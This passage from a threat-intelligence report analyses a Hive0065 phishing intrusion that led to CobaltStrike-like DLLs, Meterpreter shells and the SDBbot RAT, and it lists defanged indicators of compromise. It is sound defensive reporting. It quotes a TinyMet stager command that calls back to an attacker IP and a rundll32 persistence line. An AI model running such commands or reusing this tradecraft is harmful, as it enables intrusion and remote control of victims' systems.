The TTPs that we found are consistent with previous activity attributed to Hive0065:</p> <ul> <li class="">Spear phishing to deliver malware</li> <li class="">Macro-enabled documents</li> <li class="">The use of droppers containing embedded dynamic-link libraries (DLLs)</li> <li class="">The use of an installer component</li> <li class="">The use of legitimate cloud hosting services for malware distribution</li> <li class="">Spoofing legitimate services like Microsoft and Google</li> <li>C&amp;C domains similar in naming convention and structure (sample of domain names shown below)</li> </ul> <table style="width: 100%;" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td style="font-size: 12px;" valign="top"><strong>Domains reported<br> by X-Force</strong></td> <td style="font-size: 12px;" valign="top"><strong>Domains reported<br> by Proofpoint</strong></td> <td style="font-size: 12px;" valign="top"><strong>Domains reported<br> by ZeroFOX</strong></td> </tr> <tr> <td style="font-size: 12px;" valign="top">drm-server-booking[.]com</td> <td style="font-size: 12px;" valign="top">news-server-drm-google[.]com</td> <td style="font-size: 12px;" valign="top">office-en-service[.]com</td> </tr> <tr> <td style="font-size: 12px;" valign="top">microsoft-live-us[.]com</td> <td style="font-size: 12px;" valign="top">update365-office-ens[.]com</td> <td style="font-size: 12px;" valign="top">googledrive-download[.]com</td> </tr> <tr> <td style="font-size: 12px;" valign="top">dl1.sync-share[.]com</td> <td style="font-size: 12px;" valign="top">office365-update-en[.]com</td> <td style="font-size: 12px;" valign="top">d1.syncdownloading[.]com</td> </tr> </tbody> </table><div class="table-scroll-help-text"><span>Scroll to view full table </span></div> <h2 class="">Compromise Summary</h2> <p>In order to gain access to victim environments, Hive0065 sends a malicious email to employees purporting to be from an HR representative&rsquo;s account. 
The email body impersonated Onehub, inviting the recipient to download a malicious document named <em>Resume.doc</em>.</p> <p><amp-img src="https://securityintelligence.com/wp-content/uploads/2020/04/onehub.png" layout="intrinsic" class="" alt="Email Body Including Onehub" width="411" height="361" lightbox="lightbox"></amp-img></p> <p>The employee receiving this email downloaded and opened the document, which contained malicious code. Once the code was executed, a persistence mechanism was installed and a malicious password harvester was executed. In this instance, once the malicious code was executed, it dropped a malicious binary (DLL) similar to CobaltStrike, which subsequently created and executed additional files. The actor used the initially compromised system to escalate privileges and move laterally across additional systems on the network.</p> <h2 class="">Hive0065&rsquo;s Arsenal of Tools</h2> <h4 class="">VSPUB DLLs With CobaltStrike Code Similarities</h4> <p>The malicious email delivering the file named <em>Resume.doc</em> initially led the recipient to a malicious domain. After several redirections, the final redirect pointed to the malicious URL <em>hxxps://dl1.sync-share[.]com?Or2at</em>. In addition, we also observed employees who opened the document browsed to <em>hxxps://dl1.sync-share[.]com</em> and downloaded <em>Resume (1).doc</em> and a second file, <em>Resume (3).doc</em>.</p> <p>Seconds later, a suspicious document named <em>main_template.docx</em> was created.</p> <p>Every time <em>main_template.docx</em> was opened, VBA macros were executed and a fake Microsoft Office login window (<em>FakeL.exe</em>) was displayed to the user while a malicious payload executed in the background. If the password entered was correct, the display disappeared. 
Password attempts were written into a file named <em>Password.txt</em>, which was subsequently deleted.</p> <hr align="left" size="1" width="33%"> <p><amp-img src="https://securityintelligence.com/wp-content/uploads/2020/04/fake-windows-login.png" layout="intrinsic" class="" alt="Fake Login Display" width="450" height="103" lightbox="lightbox"></amp-img></p> <p>The document may also display the fake message &ldquo;This document is protected&rdquo; to entice users to enable content and execute malicious code. The .docx file contained embedded x86 and x64 versions of the payload DLL so that the appropriate version was dropped depending on the target operating system.</p> <p>The DLLs were dropped to the following locations:</p> <ul> <li class="left" style="text-align: left;">x86: %APPDATA%\Microsoft\Windows\Template\vspub1.dll</li> <li class="left" style="text-align: left;">x64: %APPDATA%\Microsoft\Windows\Template\vspub2.dll</li> </ul> <p>The DLLs were loaded into the memory space of <em>winword.exe</em> using the LoadLibraryW API, and the DLL module was compressed twice to hide the actual code. It used a custom packer that unpacks to UPX, an open-source executable packer, which revealed the actual code.</p> <p><amp-img src="https://securityintelligence.com/wp-content/uploads/2020/04/si-img-customPacker.jpg" layout="intrinsic" class="alignnone size-full wp-image-418038" alt="Image of a compressed module" width="800" height="73" lightbox="lightbox"></amp-img></p> <p>While these DLLs did not match existing, known code families, a code comparison showed that this code has similarities with the <a href="https://attack.mitre.org/software/S0154/" target="_blank" rel="noopener nofollow" >CobaltStrike</a> framework. The VSPUB DLLs gather system information and use HTTP POST requests to send it to the C&amp;C domain <em>microsoft-live-us[.]com/fidonet</em> or the IP address 185[.]176[.]221[.]45. 
The code suggests that upon a successful reply from the server, the DLL can download and execute additional files.</p> <p>To note, <em>microsoft-live-us[.]com</em> was registered just days before the attack took place, along with the domain <em>sync-share[.]com</em>, to include the subdomains <em>dl1.sync-share[.]com</em>, <em>dl2.sync-share[.]com</em> and <em>dl3.sync-share[.]com</em>. <em>Sync-share[.]com</em> is likely attacker-owned infrastructure, and although the dl2 and dl3 subdomains were not observed in this particular activity, it is likely that these domains will be used in a similar fashion.</p> <h4 class="">Meterpreter Reverse Shell</h4> <p>After the initial system was compromised, the actors proceeded to compromise additional systems on the network by executing malicious PowerShell services running as the local SYSTEM account, as well as by installing bind shells. A Meterpreter reverse shell was used in order to remotely control compromised systems within the internal network; it was installed as a service through the execution of an encoded PowerShell script. The malicious PowerShell command decodes into a reverse shell connecting back to two malicious IP addresses:</p> <ul> <li class="">91[.]214[.]124[.]20</li> <li class="">91[.]214[.]124[.]25</li> </ul> <p>While most samples we found during our investigations were Meterpreter reverse shells connecting back to a C&amp;C IP address, Meterpreter bind shells that listen for incoming connections were also discovered. We found that a domain admin account was compromised and the Active Directory audit tool PingCastle was run. 
Using the domain admin account, the actor was able to compromise several other accounts and execute malicious services and persistence mechanisms, namely SDBbot RAT loaders.</p> <h4 class="">TinyMet Meterpreter Stager</h4> <p>The investigation led our team to the discovery of a file named <em>wsus.exe</em> (a version of TinyMet, a tiny, flexible Meterpreter stager), along with three additional files that were created and executed on the first compromised system.</p> <p>During the investigation, TinyMet was observed being executed with the command <em>c:\intel\wsus.exe 1 91.214.124[.]20 43434</em>, indicating a reverse HTTP connection, and connected to a malicious IP address by either renaming a binary or providing specific arguments. The commands executed were used for discovery purposes, listing members of privileged groups and network information.</p> <h2 class="">SDBbot RAT</h2> <h4 class="">SDBbot RAT Installer</h4> <p>X-Force IRIS found that the SDBbot RAT installers are x64-packed and decrypt parts of SDBbot&rsquo;s code and strings upon execution. In addition, they read a binary blob located within the registry <em>HKLM\\MACHINE\\SOFTWARE\\Microsoft\\[3 characters]\[1 character]</em>. Depending on user privileges, a binary blob is located in the registry value. 
If the installer is running with regular user privileges, the installer component will establish persistence using the registry <em>Run</em> key and execute ordinal #1 of the DLL:</p> <p class="" align="center"><em>rundll32 "C:\Users\[USER]\AppData\Roaming\xrjkrobuy.dll",#1</em></p> <h4 class="">SDBbot RAT Loader</h4> <p>As part of the investigation, X-Force IRIS found that the SDBbot RAT loader we analyzed was similar in nature to the version analyzed by <a href="https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader" target="_blank" rel="noopener nofollow" >Proofpoint</a>, which was defined as the &ldquo;Loader Component&rdquo; of SDBbot in Hive0065 campaigns from October 2019. The loader component will read the binary blob and execute the contained shellcode. Once the shellcode executes, it decompresses and executes the SDBbot payload. The shellcode will check to see if it was executed earlier than the loader DLL files and if found to be &ldquo;TRUE,&rdquo; the process is terminated.</p> <h4 class="">SDBbot RAT Payload</h4> <p>Once the attackers established a foothold on the network, four new registry keys on the local Software hive were created and SDBbot RAT loader DLL files were installed as persistence mechanisms; the loaders were injected into the process <em>winlogon.exe</em> every time the process was executed.</p> <p>Upon execution, SDBbot RAT checks for the presence of the mutex <em>windows_7_windows_10_check_running_once_mutex</em> and proceeds to retrieve a C&amp;C address from the file <em>C:\ip.txt</em>. If that file is not available, it will use the C&amp;C <em>drm-server-booking[.]com</em> as the default server. SDBbot RAT will subsequently gather system information and communicate back to the C&amp;C server by sending and receiving a DWORD: 0xC0DE0000. 
The C&amp;C will send additional arguments depending on the command.</p> <h2>Conclusion</h2> <p>Hive0065 has been active since at least 2014, adjusting its TTPs, targeting and infrastructure with each campaign. A relatively recent addition to Hive0065&rsquo;s toolkit, SDBbot, is being used in attacks primarily as a second-stage malware, composed of an installer, a loader and RAT components.</p> <p>SDBbot has the ability to perform typical RAT functions, such as communicating with C&amp;Cs, receiving commands and obtaining system information. On infected systems, this malware could grant attackers extensive ability to drop and execute additional malicious payloads, control infected systems and perform actions the legitimate user would have access to. Remote-access Trojans are one of the most prevalent tools in targeted attacks as they facilitate that type of control for remote attackers.</p> <p>As X-Force IRIS continues to track Hive0065, we expect to see this group continue to target a wide range of industries using social engineering to deliver open-source and custom malware while constantly adjusting TTPs and C&amp;C infrastructure to evade detection.</p> <h2>Indicators of Compromise (IoCs)</h2> <p class=""><strong>C&amp;C IP Addresses</strong></p> <ul> <li class="">91[.]214[.]124[.]25</li> <li class="">91[.]214[.]124[.]20</li> <li class="">185[.]176[.]221[.]45</li> </ul> <p class=""><strong>C&amp;C Domains</strong></p> <ul> <li class="">drm-server-booking[.]com</li> <li class="">microsoft-live-us[.]com</li> <li class="">dl1.sync-share[.]com</li> </ul> <p class=""><strong>URL Redirections</strong></p> <ul> <li class="">https://eur01.safelinks.protection.outlook[.]com/?url=https://clck.ru/JnFFT&amp;data=02|01||bed42450519b40df4d8808d762bd4ff1|d847080b33824b27886012fe4d8edb27|1|0|637086437565223782&amp;sdata=0VDHXIfGUjxrbDC0fnF/VcgoQIGSAD/PBCYcwFodSH4=&amp;reserved=0</li> <li class="">https://clck[.]ru/JnFFT</li> <li 
class="">https://sba.yandex[.]net/redirect?url=https%3A%2F%2Fdl1.sync-</li> <li>share.com%3FOr2at&amp;client=clck&amp;sign=2a3f3d25a38344769c6cfb6705a0f918&prime;</li> </ul> <p class=""><strong>Final Redirection Hosting Malicious Document</strong></p> <ul> <li class="">https://dl1.sync-share[.]com?Or2at</li> </ul> <p class=""><strong>Files</strong></p> <table style="width: 100%; font-size: 12px;" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td valign="top"><strong>File name</strong></td> <td valign="top"><strong>SHA1</strong></td> <td valign="top"><strong>Description</strong></td> </tr> <tr> <td valign="top">main_template.docx</td> <td valign="top">33094acd614825a916b77df6c5141c088fc3768b</td> <td valign="top">Malicious document</td> </tr> <tr> <td valign="top">vspub1.dll</td> <td valign="top">bf0f7abda2228059bb00ec9658ee447fbe84d277</td> <td valign="top">CobaltStrike similarities</td> </tr> <tr> <td valign="top">vspub2.dll</td> <td valign="top">d40510da42a478d72e649993208710668a7f6c27</td> <td valign="top">CobaltStrike similarities</td> </tr> <tr> <td valign="top">xrjkrobuy.dll</td> <td valign="top">14f52ae68344e1643b3066c10f7044fdd819db4e</td> <td valign="top">SDBot RAT</td> </tr> <tr> <td valign="top">upywloeza.dll</td> <td valign="top">0cc7cca16afd632857e3883c06b2f55c057b563e</td> <td valign="top">SDBot RAT</td> </tr> <tr> <td valign="top">dtzvlbtxn.dll</td> <td valign="top">d36e983886a084887f887c6d562d3bc0664587c4</td> <td valign="top">SDBot RAT</td> </tr> <tr> <td valign="top">lvgoywrnxwy.dll</td> <td valign="top">fea7d944e317c7b2ef1aba57600a8c5310368085</td> <td valign="top">SDBot RAT</td> </tr> <tr> <td valign="top">qcuqqgxmy.dll</td> <td valign="top">35423e04e58ab1f2267e19c47e1c69ea5b7041cc</td> <td valign="top">SDBot RAT</td> </tr> <tr> <td valign="top">pdxqzmftr.dll</td> <td valign="top">fd9620c0c295caaee3096423532bb1dbfb7064c5</td> <td valign="top">SDBot RAT</td> </tr> <tr> <td valign="top">lowpro3.13.exe</td> <td 
valign="top">cb0b39534d99057b02b090c3650fb1de43d19a02</td> <td valign="top">Binary</td> </tr> <tr> <td valign="top">wsus.exe</td> <td valign="top">caff1d315a5d87014e5fa62346f58407755d971e</td> <td valign="top">Meterpreter stager</td> </tr> <tr> <td valign="top">FakeL.exe</td> <td valign="top">45c43ec18d15ba7850e6ad2e2e54671636f4d926</td> <td valign="top">Password Stealer</td> </tr> </tbody> </table><div class="table-scroll-help-text"><span>Scroll to view full table </span></div> <div id="nc_pixel"></div><div class="post__tags"> <a href="https://securityintelligence.com/tag/command-and-control-cc/" rel="tag">Command-and-Control (C&amp;C)</a><span>&nbsp;|&nbsp;</span><a href="https://securityintelligence.com/tag/cyber-crime/" rel="tag">Cybercrime</a><span>&nbsp;|&nbsp;</span><a href="https://securityintelligence.com/tag/macros/" rel="tag">Macros</a><span>&nbsp;|&nbsp;</span><a href="https://securityintelligence.com/tag/malware/" rel="tag">Malware</a><span>&nbsp;|&nbsp;</span><a href="https://securityintelligence.com/tag/malware-analysis/" rel="tag">Malware Analysis</a><span>&nbsp;|&nbsp;</span><a href="https://securityintelligence.com/tag/open-source/" rel="tag">Open Source</a><span>&nbsp;|&nbsp;</span><a href="https://securityintelligence.com/tag/remote-access-trojan/" rel="tag">Remote-Access Trojan (RAT)</a><span>&nbsp;|&nbsp;</span><a href="https://securityintelligence.com/tag/targeted-attacks/" rel="tag">Targeted Attacks</a><span>&nbsp;|&nbsp;</span><a href="https://securityintelligence.com/tag/threat-intelligence-2/" rel="tag">Threat Intelligence</a><span>&nbsp;|&nbsp;</span><a href="https://securityintelligence.com/tag/trojan/" rel="tag">Trojan</a><span>&nbsp;|&nbsp;</span><a href="https://securityintelligence.com/tag/x-force/" rel="tag">X-Force</a></div> <div class="post__author author "> <div class="author__box"> <div class="author__photo" style="background-image: 
url(https://securityintelligence.com/wp-content/uploads/2020/04/profile-pic-2.jpg);"></div> <div class="author__infos"> <div class="author__name"><a href="https://securityintelligence.com/author/melissa-frydrych/" >Melissa Frydrych</a></div> <div class="author__role">Threat Hunt Researcher, IBM</div> </div> </div> </div> <!-- CONTINUE READING --> <style type="text/css"> .post__content--continue_reading{ max-height: 725px; overflow:hidden; transition: max-height cubic-bezier(0.9, 0, 1, 1) 2s; } @media (max-width: 768px) { .post__content--continue_reading{ max-height: 1225px; } } </style> <div class="continue_reading_wrapper" id="continue_reading"> <button on="tap: post__content.toggleClass(class=post__content--continue_reading), continue_reading.toggleClass(class=continue_reading_wrapper--clicked)" tabindex="0" role="button">Continue Reading</button> </div> </main> </div> </div> <aside class="grid__sidebar post__sidebar "> <div class="mobile_divider"></div> <header class="post__sidebar__header">POPULAR</header> <!-- ARTICLES --> <article class="article article_grid article__mobile--card"> <!-- IMG --> <a class="exclusive_article__category_link" href="https://securityintelligence.com/articles/how-red-teaming-helps-safeguard-the-infrastructure-behind-ai-models/" aria-label="How red teaming helps safeguard the infrastructure behind AI models"> <div class="article__img"> <amp-img alt="A woman in a red shirt sitting at a desk in an office with her back to us working on a laptop" width="1200" height="630" layout="responsive" src="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2025/02/In-a-contemporary-office-setting-a-young-businesswoman-is-focused-on-her-laptop-displaying-dedication-and-efficiency-in-her-work-630x330.jpeg.webp"> <amp-img fallback alt="A woman in a red shirt sitting at a desk in an office with her back to us working on a laptop" width="1200" height="630" layout="responsive" 
